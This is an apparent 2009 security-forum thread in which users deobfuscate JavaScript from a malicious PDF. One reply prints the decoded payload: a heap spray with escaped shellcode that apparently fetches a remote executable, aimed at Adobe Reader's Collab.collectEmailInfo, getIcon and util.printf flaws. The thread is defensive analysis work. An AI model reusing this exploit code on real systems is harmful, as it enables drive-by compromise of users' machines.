Author Topic: decoding JS decode64  (Read 5065 times)

0 Members and 1 Guest are viewing this topic.

November 16, 2009, 03:33:25 am
Read 5065 times

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13
Hello there

I'm trying to decode a pdf file which after decompressing the FlateDecode, the JS turns out to be obfuscated with decode64 function. I've tried using spidermonkey to unpack the JS code, but there is no eval.00x.log produced.
I've tried to append eval = print; and so on, but also with no success.

I've attached with this post the sample of the pdf file, with password = infected

Thank you in advance

November 16, 2009, 06:23:40 am
Reply #1

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
If you use Didier Steven's pdf-parser.py with -f -w options you'll see the following code in the pdf

Code: [Select]

var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;
   input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
   do {
      enc1 = keyXXXStr.indexOf(input.charAt(i++));
      enc2 = keyXXXStr.indexOf(input.charAt(i++));
      enc3 = keyXXXStr.indexOf(input.charAt(i++));
      enc4 = keyXXXStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
         output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
         output = output + String.fromCharCode(chr3);
      }
   } while (i < input.length);
   return output;
}
var aasd = decode64("DQogdmFyIEFzUjlZdFggPSBuZXcgQXJyYXkoKTsNCiB2YXIgeERKY21Nc....  (shortened)

The decode64 function is just a base64 decoder. Cut&paste the string between quotes from variable "aasd" into it and it will output the following.

Code: [Select]
var AsR9YtX = new Array();
 var xDJcmMp;
 var lave = eval;
  lave(unescape("%20%20%20%66%75%6e%63%74%69%6f%6e%20%78%48%48%4b%63%6e%4c%28%65%49%46%67%59%59%6a%2c%20%66%41%41%68%34%62%71%29%20%20%20%7b%20%20%20%20%20%77%68%69%6c%65%28%65%49%46%67%59%59%6a%2e%6c%65%6e%67%74%68%20%2a%20%32%20%3c%20%66%41%41%68%34%62%71%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%65%49%46%67%59%59%6a%20%2b%3d%20%65%49%46%67%59%59%6a%3b%20%20%20%20%20%7d%20%20%20%20%20%65%49%46%67%59%59%6a%20%3d%20%65%49%46%67%59%59%6a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%20%66%41%41%68%34%62%71%20%2f%20%32%29%3b%20%20%20%20%20%72%65%74%75%72%6e%20%65%49%46%67%59%59%6a%3b%20%20%20%7d%20%20"));  lave(unescape("%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%5a%55%4e%63%69%67%46%28%78%34%35%53%4b%4d%6d%29%20%20%20%7b%20%20%20%20%20%69%66%28%78%34%35%53%4b%4d%6d%20%3d%3d%20%30%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%76%61%72%20%42%41%39%74%54%4e%61%20%3d%20%30%78%30%63%30%63%30%63%30%63%3b%20%20%20%20%20%20%20%76%61%72%20%49%77%4b%62%38%56%4a%20%3d%20%20%75%6e%65%73%63%61%70%65%28%22%25%75%43%30%33%33%25%75%38%42%36%34%25%75%33%30%34%30%25%75%30%43%37%38%25%75%34%30%38%42%25%75%38%42%30%43%25%75%31%43%37%30%25%75%38%42%41%44%25%75%30%38%35%38%25%75%30%39%45%42%25%75%34%30%38%42%25%75%38%44%33%34%25%75%37%43%34%30%25%75%35%38%38%42%25%75%36%41%33%43%25%75%35%41%34%34%25%75%45%32%44%31%25%75%45%32%32%42%25%75%45%43%38%42%25%75%34%46%45%42%25%75%35%32%35%41%25%75%45%41%38%33%25%75%38%39%35%36%25%75%30%34%35%35%25%75%35%37%35%36%25%75%37%33%38%42%25%75%38%42%33%43%25%75%33%33%37%34%25%75%30%33%37%38%25%75%35%36%46%33%25%75%37%36%38%42%25%75%30%33%32%30%25%75%33%33%46%33%25%75%34%39%43%39%25%75%34%31%35%30%25%75%33%33%41%44%25%75%33%36%46%46%25%75%42%45%30%46%25%75%30%33%31%34%25%75%46%32%33%38%25%75%30%38%37%34%25%75%43%46%43%31%25%75%30%33%30%44%25%75%34%30%46%41%25%75%45%46%45%42%25%75%33%42%35%38%25%75%37%35%46%38%25%75%35%45%45%35%25%75%34%36%38%42%25%75%30%33%32%34%25%75%36%36%43%33%25%75%30%43%38%42%25%75%38%42%34%38%25%75%31%43%35%36%25%75%44%33%30%33%25%75%30%34%38%42%25%75%30%33%38%41%25%75%35%46%43%33%25%75%35%30%35%45%25%75%38%44%43%33%25%75%30%38%37%44%25%75%35%32%35%37%25%75%33%33%42%38%25%75%38%41%43%41%25%75%45%38%35%42%25%75%46%46%41%32%25%75%46%46%46%46%25%75%43%30%33%32%25%75%46%37%38%42%25%75%41%45%46%32%25%75%42%38%34%46%25%75%32%45%36%35%25%75%37%38%36%35%25%75%36%36%41%42%25%75%36%36%39%38%25%75%42%30%41%42%25%75%38%41%36%43%25%75%39%38%45%30%25%75%36%38%35%30%25%75%36%45%36%46%25%75%36%34%32%45%25%75%37%35%36%38%25%75%36%43%37%32%25%75%35%34%36%44%25%75%38%45%42%38%25%75%30%45%34%45%25%75%46%46%45%43%25%75%30%34%35%35%25%75%35%30%39%33%25%75%43%30%33%33%25%75%35%30%35%30%25%75%38%42%35%36%25%75%30%34%35%35%25%75%43%32%38%33%25%75%38%33%37%46%25%75%33%31%43%32%25%75%35%30%35%32%25%75%33%36%42%38%25%75%32%46%31%41%25%75%46%46%37%30%25%75%30%34%35%35%25%75%33%33%35%42%25%75%35%37%46%46%25%75%42%38%35%36%25%75%46%45%39%38%25%75%30%45%38%41%25%75%35%35%46%46%25%75%35%37%30%34%25%75%45%46%42%38%25%75%45%30%43%45%25%75%46%46%36%30%25%75%30%34%35%35%25%75%37%34%36%38%25%75%37%30%37%34%25%75%32%46%33%41%25%75%36%46%32%46%25%75%36%36%36%36%25%75%36%35%36%45%25%75%37%33%37%37%25%75%36%33%32%45%25%75%32%46%36%45%25%75%32%46%33%31%25%75%36%35%36%37%25%75%36%35%37%34%25%75%36%35%37%38%25%75%37%30%32%45%25%75%37%30%36%38%25%75%37%33%33%46%25%75%36%43%37%30%25%75%37%30%33%44%25%75%36%36%36%34%25%75%36%35%35%46%25%75%37%30%37%38%22%29%3b%20%20%20%20%20%7d%20%20%20%20%20%65%6c%73%65%20%69%66%28%78%34%35%53%4b%4d%6d%20%3d%3d%20%31%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%42%41%39%74%54%4e%61%20%3d%20%30%78%33%30%33%30%33%30%33%30%3b%20%20%20%20%20%20%20%76%61%72%20%49%77%4b%62%38%56%4a%20%3d%20%20%75%6e%65%73%63%61%70%65%28%22%25%75%43%30%33%33%25%75%38%42%36%34%25%75%33%30%34%30%25%75%30%43%37%38%25%75%34%30%38%42%25%75%38%42%30%43%25%75%31%43%37%30%25%75%38%42%41%44%25%75%30%38%35%38%25%75%30%39%45%42%25%75%34%30%38%42%25%75%38%44%33%34%25%75%37%43%34%30%25%75%35%38%38%42%25%75%36%41%33%43%25%75%35%41%34%34%25%75%45%32%44%31%25%75%45%32%32%42%25%75%45%43%38%42%25%75%34%46%45%42%25%75%35%32%35%41%25%75%45%41%38%33%25%75%38%39%35%36%25%75%30%34%35%35%25%75%35%37%35%36%25%75%37%33%38%42%25%75%38%42%33%43%25%75%33%33%37%34%25%75%30%33%37%38%25%75%35%36%46%33%25%75%37%36%38%42%25%75%30%33%32%30%25%75%33%33%46%33%25%75%34%39%43%39%25%75%34%31%35%30%25%75%33%33%41%44%25%75%33%36%46%46%25%75%42%45%30%46%25%75%30%33%31%34%25%75%46%32%33%38%25%75%30%38%37%34%25%75%43%46%43%31%25%75%30%33%30%44%25%75%34%30%46%41%25%75%45%46%45%42%25%75%33%42%35%38%25%75%37%35%46%38%25%75%35%45%45%35%25%75%34%36%38%42%25%75%30%33%32%34%25%75%36%36%43%33%25%75%30%43%38%42%25%75%38%42%34%38%25%75%31%43%35%36%25%75%44%33%30%33%25%75%30%34%38%42%25%75%30%33%38%41%25%75%35%46%43%33%25%75%35%30%35%45%25%75%38%44%43%33%25%75%30%38%37%44%25%75%35%32%35%37%25%75%33%33%42%38%25%75%38%41%43%41%25%75%45%38%35%42%25%75%46%46%41%32%25%75%46%46%46%46%25%75%43%30%33%32%25%75%46%37%38%42%25%75%41%45%46%32%25%75%42%38%34%46%25%75%32%45%36%35%25%75%37%38%36%35%25%75%36%36%41%42%25%75%36%36%39%38%25%75%42%30%41%42%25%75%38%41%36%43%25%75%39%38%45%30%25%75%36%38%35%30%25%75%36%45%36%46%25%75%36%34%32%45%25%75%37%35%36%38%25%75%36%43%37%32%25%75%35%34%36%44%25%75%38%45%42%38%25%75%30%45%34%45%25%75%46%46%45%43%25%75%30%34%35%35%25%75%35%30%39%33%25%75%43%30%33%33%25%75%35%30%35%30%25%75%38%42%35%36%25%75%30%34%35%35%25%75%43%32%38%33%25%75%38%33%37%46%25%75%33%31%43%32%25%75%35%30%35%32%25%75%33%36%42%38%25%75%32%46%31%41%25%75%46%46%37%30%25%75%30%34%35%35%25%75%33%33%35%42%25%75%35%37%46%46%25%75%42%38%35%36%25%75%46%45%39%38%25%75%30%45%38%41%25%75%35%35%46%46%25%75%35%37%30%34%25%75%45%46%42%38%25%75%45%30%43%45%25%75%46%46%36%30%25%75%30%34%35%35%25%75%37%34%36%38%25%75%37%30%37%34%25%75%32%46%33%41%25%75%36%46%32%46%25%75%36%36%36%36%25%75%36%35%36%45%25%75%37%33%37%37%25%75%36%33%32%45%25%75%32%46%36%45%25%75%32%46%33%31%25%75%36%35%36%37%25%75%36%35%37%34%25%75%36%35%37%38%25%75%37%30%32%45%25%75%37%30%36%38%25%75%37%33%33%46%25%75%36%43%37%30%25%75%37%30%33%44%25%75%36%36%36%34%25%75%36%35%35%46%25%75%37%30%37%38%22%29%3b%20%20%20%20%20%7d%20%20%20%20%20%65%6c%73%65%20%69%66%28%78%34%35%53%4b%4d%6d%20%3d%3d%20%32%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%76%61%72%20%49%77%4b%62%38%56%4a%20%3d%20%20%75%6e%65%73%63%61%70%65%28%22%25%75%43%30%33%33%25%75%38%42%36%34%25%75%33%30%34%30%25%75%30%43%37%38%25%75%34%30%38%42%25%75%38%42%30%43%25%75%31%43%37%30%25%75%38%42%41%44%25%75%30%38%35%38%25%75%30%39%45%42%25%75%34%30%38%42%25%75%38%44%33%34%25%75%37%43%34%30%25%75%35%38%38%42%25%75%36%41%33%43%25%75%35%41%34%34%25%75%45%32%44%31%25%75%45%32%32%42%25%75%45%43%38%42%25%75%34%46%45%42%25%75%35%32%35%41%25%75%45%41%38%33%25%75%38%39%35%36%25%75%30%34%35%35%25%75%35%37%35%36%25%75%37%33%38%42%25%75%38%42%33%43%25%75%33%33%37%34%25%75%30%33%37%38%25%75%35%36%46%33%25%75%37%36%38%42%25%75%30%33%32%30%25%75%33%33%46%33%25%75%34%39%43%39%25%75%34%31%35%30%25%75%33%33%41%44%25%75%33%36%46%46%25%75%42%45%30%46%25%75%30%33%31%34%25%75%46%32%33%38%25%75%30%38%37%34%25%75%43%46%43%31%25%75%30%33%30%44%25%75%34%30%46%41%25%75%45%46%45%42%25%75%33%42%35%38%25%75%37%35%46%38%25%75%35%45%45%35%25%75%34%36%38%42%25%75%30%33%32%34%25%75%36%36%43%33%25%75%30%43%38%42%25%75%38%42%34%38%25%75%31%43%35%36%25%75%44%33%30%33%25%75%30%34%38%42%25%75%30%33%38%41%25%75%35%46%43%33%25%75%35%30%35%45%25%75%38%44%43%33%25%75%30%38%37%44%25%75%35%32%35%37%25%75%33%33%42%38%25%75%38%41%43%41%25%75%45%38%35%42%25%75%46%46%41%32%25%75%46%46%46%46%25%75%43%30%33%32%25%75%46%37%38%42%25%75%41%45%46%32%25%75%42%38%34%46%25%75%32%45%36%35%25%75%37%38%36%35%25%75%36%36%41%42%25%75%36%36%39%38%25%75%42%30%41%42%25%75%38%41%36%43%25%75%39%38%45%30%25%75%36%38%35%30%25%75%36%45%36%46%25%75%36%34%32%45%25%75%37%35%36%38%25%75%36%43%37%32%25%75%35%34%36%44%25%75%38%45%42%38%25%75%30%45%34%45%25%75%46%46%45%43%25%75%30%34%35%35%25%75%35%30%39%33%25%75%43%30%33%33%25%75%35%30%35%30%25%75%38%42%35%36%25%75%30%34%35%35%25%75%43%32%38%33%25%75%38%33%37%46%25%75%33%31%43%32%25%75%35%30%35%32%25%75%33%36%42%38%25%75%32%46%31%41%25%75%46%46%37%30%25%75%30%34%35%35%25%75%33%33%35%42%25%75%35%37%46%46%25%75%42%38%35%36%25%75%46%45%39%38%25%75%30%45%38%41%25%75%35%35%46%46%25%75%35%37%30%34%25%75%45%46%42%38%25%75%45%30%43%45%25%75%46%46%36%30%25%75%30%34%35%35%25%75%37%34%36%38%25%75%37%30%37%34%25%75%32%46%33%41%25%75%36%46%32%46%25%75%36%36%36%36%25%75%36%35%36%45%25%75%37%33%37%37%25%75%36%33%32%45%25%75%32%46%36%45%25%75%32%46%33%31%25%75%36%35%36%37%25%75%36%35%37%34%25%75%36%35%37%38%25%75%37%30%32%45%25%75%37%30%36%38%25%75%37%33%33%46%25%75%36%43%37%30%25%75%37%30%33%44%25%75%36%36%36%34%25%75%36%35%35%46%25%75%37%30%37%38%22%29%3b%20%20%20%20%20%7d%20%20%20%20%20%76%61%72%20%51%37%30%6d%62%57%4f%20%3d%20%30%78%34%30%30%30%30%30%3b%20%20%20%20%20%76%61%72%20%66%44%65%6f%47%69%47%20%3d%20%49%77%4b%62%38%56%4a%2e%6c%65%6e%67%74%68%20%2a%20%32%3b%20%20%20%20%20%76%61%72%20%66%41%41%68%34%62%71%20%3d%20%51%37%30%6d%62%57%4f%20%2d%20%28%66%44%65%6f%47%69%47%20%2b%20%30%78%33%38%29%3b%20%20%20%20%20%76%61%72%20%65%49%46%67%59%59%6a%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%22%29%3b%20%20%20%20%20%65%49%46%67%59%59%6a%20%3d%20%78%48%48%4b%63%6e%4c%28%65%49%46%67%59%59%6a%2c%20%66%41%41%68%34%62%71%29%3b%20%20%20%20%20%76%61%72%20%6c%36%33%59%46%41%53%20%3d%20%28%42%41%39%74%54%4e%61%20%2d%20%30%78%34%30%30%30%30%30%29%20%2f%20%51%37%30%6d%62%57%4f%3b%20%20%20%20%20%66%6f%72%28%76%61%72%20%66%59%34%6a%55%4e%4c%20%3d%20%30%3b%20%66%59%34%6a%55%4e%4c%20%3c%20%6c%36%33%59%46%41%53%3b%20%66%59%34%6a%55%4e%4c%2b%2b%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%41%73%52%39%59%74%58%5b%66%59%34%6a%55%4e%4c%5d%20%3d%20%65%49%46%67%59%59%6a%20%2b%20%49%77%4b%62%38%56%4a%3b%20%20%20%20%20%7d%20%20%20%7d%20%20"));  lave(unescape("%20%20%20%66%75%6e%63%74%69%6f%6e%20%65%74%65%6d%7a%6f%59%28%29%20%20%20%7b%20%20%20%20%20%76%61%72%20%72%4c%78%75%59%62%69%20%3d%20%30%3b%20%20%20%20%20%76%61%72%20%69%4b%79%52%50%32%7a%20%3d%20%61%70%70%2e%76%69%65%77%65%72%56%65%72%73%69%6f%6e%2e%74%6f%53%74%72%69%6e%67%28%29%3b%20%20%20%20%20%61%70%70%2e%63%6c%65%61%72%54%69%6d%65%4f%75%74%28%78%44%4a%63%6d%4d%70%29%3b%20%20%20%20%20%69%66%28%28%69%4b%79%52%50%32%7a%20%3e%3d%20%38%20%26%26%20%69%4b%79%52%50%32%7a%20%3c%20%38%2e%31%30%32%29%20%7c%7c%20%69%4b%79%52%50%32%7a%20%3c%20%37%2e%31%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%5a%55%4e%63%69%67%46%28%30%29%3b%20%20%20%20%20%20%20%76%61%72%20%4d%42%53%4e%6b%56%38%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30%63%30%63%25%75%30%63%30%63%22%29%3b%20%20%20%20%20%20%20%77%68%69%6c%65%28%4d%42%53%4e%6b%56%38%2e%6c%65%6e%67%74%68%20%3c%20%34%34%39%35%32%29%20%4d%42%53%4e%6b%56%38%20%2b%3d%20%4d%42%53%4e%6b%56%38%3b%20%20%20%20%20%20%20%76%61%72%20%6f%74%54%71%6d%39%63%20%3d%20%74%68%69%73%3b%20%20%20%20%20%20%20%76%61%72%20%73%77%42%4d%48%39%48%20%3d%20%43%6f%6c%6c%61%62%3b%20%20%20%20%20%20%20%6f%74%54%71%6d%39%63%5b%22%63%6f%6c%6c%61%62%53%74%6f%72%65%22%5d%20%3d%20%73%77%42%4d%48%39%48%5b%22%63%6f%6c%6c%65%63%74%45%6d%61%69%6c%49%6e%66%6f%22%5d%28%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%73%75%62%6a%20%3a%20%22%22%2c%20%6d%73%67%20%3a%20%4d%42%53%4e%6b%56%38%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%29%3b%20%20%20%20%20%7d%20%20%20%20%20%69%66%28%28%69%4b%79%52%50%32%7a%20%3e%3d%20%38%2e%31%30%32%20%26%26%20%69%4b%79%52%50%32%7a%20%3c%20%38%2e%31%30%34%29%20%7c%7c%20%28%69%4b%79%52%50%32%7a%20%3e%3d%20%39%20%26%26%20%69%4b%79%52%50%32%7a%20%3c%20%39%2e%31%29%20%7c%7c%20%69%4b%79%52%50%32%7a%20%3c%3d%20%37%2e%31%30%31%29%20%20%20%20%20%7b%20%20%20%20%20%20%20%74%72%79%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%69%66%28%61%70%70%2e%64%6f%63%2e%43%6f%6c%6c%61%62%2e%67%65%74%49%63%6f%6e%29%20%20%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%20%20%5a%55%4e%63%69%67%46%28%32%29%3b%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%5a%6a%7a%67%35%79%38%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%30%39%22%29%3b%20%20%20%20%20%20%20%20%20%20%20%77%68%69%6c%65%28%5a%6a%7a%67%35%79%38%2e%6c%65%6e%67%74%68%20%3c%20%30%78%34%30%30%30%29%20%20%20%20%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%5a%6a%7a%67%35%79%38%20%2b%3d%20%5a%6a%7a%67%35%79%38%3b%20%20%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%20%20%5a%6a%7a%67%35%79%38%20%3d%20%22%4e%2e%22%20%2b%20%5a%6a%7a%67%35%79%38%3b%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%76%7a%38%30%41%5a%58%20%3d%20%61%70%70%3b%20%20%20%20%20%20%20%20%20%20%20%76%7a%38%30%41%5a%58%5b%22%64%6f%63%22%5d%5b%22%43%6f%6c%6c%61%62%22%5d%5b%22%67%65%74%49%63%6f%6e%22%5d%28%5a%6a%7a%67%35%79%38%29%3b%20%20%20%20%20%20%20%20%20%20%20%72%4c%78%75%59%62%69%20%3d%20%31%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%65%6c%73%65%20%20%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%20%20%72%4c%78%75%59%62%69%20%3d%20%31%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%63%61%74%63%68%28%65%29%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%72%4c%78%75%59%62%69%20%3d%20%31%3b%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%69%66%28%72%4c%78%75%59%62%69%20%3d%3d%20%31%29%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%69%66%28%69%4b%79%52%50%32%7a%20%3d%3d%20%38%2e%31%30%32%20%7c%7c%20%69%4b%79%52%50%32%7a%20%3d%3d%20%37%2e%31%29%20%20%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%20%20%5a%55%4e%63%69%67%46%28%31%29%3b%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%6d%35%66%41%78%30%31%20%3d%20%22%31%32%39%39%39%39%39%39%39%39%39%39%39%39%39%39%39%39%39%39%22%3b%20%20%20%20%20%20%20%20%20%20%20%66%6f%72%28%61%48%64%57%44%6f%74%20%3d%20%30%3b%20%61%48%64%57%44%6f%74%20%3c%20%32%37%36%3b%20%61%48%64%57%44%6f%74%2b%2b%29%20%20%20%20%20%20%20%20%20%20%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%6d%35%66%41%78%30%31%20%2b%3d%20%22%38%22%3b%20%20%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%6e%77%41%4d%67%30%33%20%3d%20%75%74%69%6c%3b%20%20%20%20%20%20%20%20%20%20%20%6e%77%41%4d%67%30%33%5b%22%70%72%69%6e%74%66%22%5d%28%22%25%34%35%30%30%30%66%22%2c%20%6d%35%66%41%78%30%31%29%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%7d%20%20%20%20%20%7d%20%20%7d%20%20"));
 app.P90F8GP = etemzoY;
 xDJcmMp = app.setTimeOut("app.P90F8GP()", 1);

November 16, 2009, 06:42:29 am
Reply #2

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13
> Cut&paste the string between quotes from variable "aasd" into it and it will output the following.

sorry for not getting your instruction. may I know what first 'it' and the second 'it' means from your sentence ?

November 16, 2009, 07:20:56 am
Reply #3

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
HA!  My bad :D   You can use any public base64 decoder.

http://home2.paulschou.net/tools/xlate/ is an example of one. It has source available so you can run it on a local server. I host one locally for my team plus our Console has a base64 decoder built in.

November 16, 2009, 07:34:28 am
Reply #4

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13
Hehe no problem. Thank you so much for sharing.
But I'm quite curious actually. From the first code (from your post), we can see that there is a function decode64 which obviously decoding the base64, why it doesn't work with spidermonkey js?
I've also encountered with such obfuscation before that use base64 (similar like this) with function base64 with it. And when i run js spidermonkey, it can decode it.
This confuse me

November 16, 2009, 07:45:16 am
Reply #5

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
I'm not sure. I use a local copy of jsunpack-n with Didier Steven's js-mod instead of normal js-spidermonkey. Plus with work I'm getting used to decoding many of these by hand and using a local browser and webserver and just replacing eval with alert and working the long way :]

November 17, 2009, 07:28:33 pm
Reply #6

d3t0n4t0r

  • Jr. Member

  • Offline
  • **

  • 13
Yes. thats the most proper way for handling that things. slow and steady. :)
Thanks for sharing, your technique really help me a lot.
Glad to add some more information and knowledge on this